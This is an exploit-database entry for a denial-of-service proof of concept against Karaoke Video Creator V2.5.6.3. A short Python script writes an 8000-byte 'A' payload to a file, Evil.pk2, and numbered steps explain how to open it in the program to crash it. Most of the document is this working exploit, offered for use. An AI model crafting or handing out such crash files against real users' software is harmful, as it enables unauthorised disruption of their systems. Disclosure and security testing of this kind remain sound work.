id: 37654
date: 04/20/2022
title: Karaoke Video Creator V2.5.6.3  Denial of Service Exploit
author: Achilles
cves: 

# Exploit Title: Karaoke Video Creator V2.5.6.3  Denial of Service Exploit
# Date: 20.04.2022
# Vendor Homepage:https://www.powerkaraoke.com
# Software Link:  https://www.powerkaraoke.com/download/karaoke-video-creator-setup.exe?v=2.5.6.3
# Exploit Author: Achilles
# Tested Version: V2.5.6.3
# Tested on: Windows 7 x64


# 1.- Run python code :Karaoke.py
# 2.- File Evil.pk2 was Created
# 3.- Open Karaoke Video Creator and Click File and Open
# 4.- Select Evil.pk2 
# 5.- Click 'OK' and you will see a crash.



#!/usr/bin/env python
buffer = "\x41" * 8000

try:
	f=open("Evil.pk2","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"

#  0day.today [2023-03-26]  #